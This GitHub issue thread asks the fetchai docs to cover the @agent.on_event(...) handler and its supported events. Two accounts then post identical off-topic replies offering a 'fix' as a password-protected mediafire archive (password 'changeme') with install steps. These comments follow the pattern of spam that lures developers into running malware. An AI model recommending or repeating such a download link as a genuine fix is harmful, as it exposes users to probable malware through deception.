### ISSUE TITLE
Missing @agent.on_event(...) details

### ISSUE THREAD

**Issue by tanaygodse** [fetchai/deprecated-docs#914]
### Prerequisites

- [X] I checked the [existing issues](https://github.com/fetchai/docs/issues) and made sure there are no similar bug reports

### Category

Incorrect or missing Content

### Expected Behavior / Content

All Agent Handlers should be mentioned and all related options should be described.

### Observed Behavior / Content

Title: Missing @agent.on_event(...) details

Suggested Change:
Add details and description for @agent.on_event(...) to the "Agent Handlers" tutorial.

Justification:
The @agent.on_event(...) handler is used in the examples mentioned, however the recommended uses and supported list of "events" is not mentioned in the documentation. Adding this would make sure that all the handlers are covered and all known events are listed.

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
